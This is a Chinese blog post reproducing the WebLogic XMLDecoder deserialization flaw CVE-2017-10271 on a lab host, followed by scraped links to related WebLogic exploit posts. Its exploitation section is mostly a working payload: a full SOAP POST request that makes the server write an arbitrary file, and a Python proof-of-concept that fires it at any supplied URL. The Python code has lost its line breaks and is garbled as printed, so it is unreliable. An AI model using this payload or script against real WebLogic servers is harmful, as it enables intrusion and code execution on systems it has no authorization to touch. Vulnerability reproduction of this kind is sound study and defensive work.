Weblogic(CVE-2017-10271)漏洞复现
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)
漏洞编号:CVE-2017-10271
漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构建请求对运行WebLogic中间件的主机进行攻击,近期发现在这个漏洞的使用方式为传播挖矿程序。
受影响WebLogic版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。
A、环境搭建
不解释
B、漏洞利用:
1、初步判定:访问http://192.168.8.148:7001/wls-wsat/CoordinatorPortType11,存在下图则说明可能存在漏洞
2、构建POST包进行测试,写入test.txt
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.8.148:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 756<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>
PS:wls-wsat路径 /root/Oracle/Middleware//user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat/
3、访问test.txt,漏洞验证成功
Python验证脚本:
#!/usr/bin/env python
# coding:utf-8import requests
from sys import argvheaders = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Upgrade-Insecure-Requests': '1','Content-Type': 'text/xml'}
def Webogic_XMLDecoder_poc(url):#url="http://192.168.8.148:7001"posturl=url+'/wls-wsat/CoordinatorPortType'data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.6.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println"><string>xmldecoder_vul_test</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'''print urltry:r=requests.post(posturl,data=data,headers=headers,timeout=5)geturl=url+"/wls-wsat/test.txt"#print geturlcheck_result = requests.get(geturl,headers=headers,timeout=5)if 'xmldecoder_vul_test' in check_result.text:print u"存在WebLogic WLS远程执行漏洞(CVE-2017-10271)"except:passif __name__ == '__main__':if len(argv) == 1:print "Please input python Webogic_XMLDecoder_poc.py http://xxxx:7001"exit(0)else:url = argv[1]Webogic_XMLDecoder_poc(url)
验证截图:
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
参考文章:
https://github.com/ysrc/xunfeng/blob/master/vulscan/vuldb/weblogic_CVE_2017_10271.py
http://www.cnblogs.com/sevck/p/8092760.html
http://blog.csdn.net/qq_27446553/article/details/78952010
Weblogic(CVE-2017-10271)漏洞复现相关推荐
- 关于WebLogic环境搭建和漏洞复现
一.环境搭建 使用kali系统安装docker,再在docker上安装环境,这里以CVE-2020-14882为例 在kali进入root用户,输入 git clone https://github. ...
- Weblogic历史漏洞复现
Weblogic WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发.集成.部署和管理大型分布式 ...
- java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...
学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...
- weblogic中ssrf漏洞修复_Weblogic-SSRF漏洞复现
0x00简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发.集成.部署和管理大型分 ...
- weblogic漏洞复现(CVE-2020-2555)
漏洞环境:fofa自己找,server=weblogic port=7001 一.漏洞简介 该反序列化的gadget存在与coherence包中.具体可以见分析 构造chain类似于common-co ...
- weblogic 漏洞复现
cd vulhub/weblogic/CVE-2018-2894/ //进入对应得目录sudo service docker start //启动docker服务docker-compose up - ...
- Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628)
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未 ...
- [web攻防] weblogic 漏洞复现 CVE-2017-10271CVE-2018-2628CVE-2018-2894
用docker复现weblogic的部分高危漏洞,主要是记录下一些操作,积累自己的知识储备.由于时间与个人水平原因,不对原理做过多叙述. 目录 环境打开方式 CVE-2017-10271 weblog ...
- weblogic修改banner_Weblogic多个漏洞复现
WebLogic两处任意文件上传漏洞(CVE-2018-2894) 涉及版本: version:10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3 漏洞地址 WebLogic管理端 ...
- 【漏洞复现】Weblogic CVE-2023-21839
一.漏洞简介 1. 产品简介 WebLogic是Oracle公司研发的用于开发.集成.部署和管理大型分布式Web应用.网络应用和数据库应用的Java应用服务器,在全球范围内被广泛使用. 2. 漏洞简介 ...
最新文章
- 说人话教AI打游戏,Facebook开源迷你版星际争霸,成果登上NeurIPS 2019
- spring手动控制事务开启_“上帝视角”图解Spring事务的传播机制原理
- Mysql 8主从复制配置图解
- python基础查漏补缺1--算数、字符串与变量
- SpringMVC4 实例
- 5G 背面:物联网的变局!
- 作业MathExam
- 关于C#解决无法解析skinEngine和使用皮肤的问题
- 浅谈软件开发的四大要素
- mysql中update语句怎么设置变量_MySQL数据库update语句使用详解
- 有个人在偷偷的爱着你
- Nginx负载均衡探活max_fails和fail_timeout的设置、根据参数转发upstream
- 计算机教室架构,物联网智慧教室架构
- Reflex WMS入门系列三十二:导出到Excel
- 博客添加人体时钟效果
- python求平衡点的几种方法
- 在线压力并发工具AB版 简单易用
- 华为云桌面,开启云上高效办公之旅!
- inf文件详解(转)
- 三菱FX5U PLSV指令-可变速度输出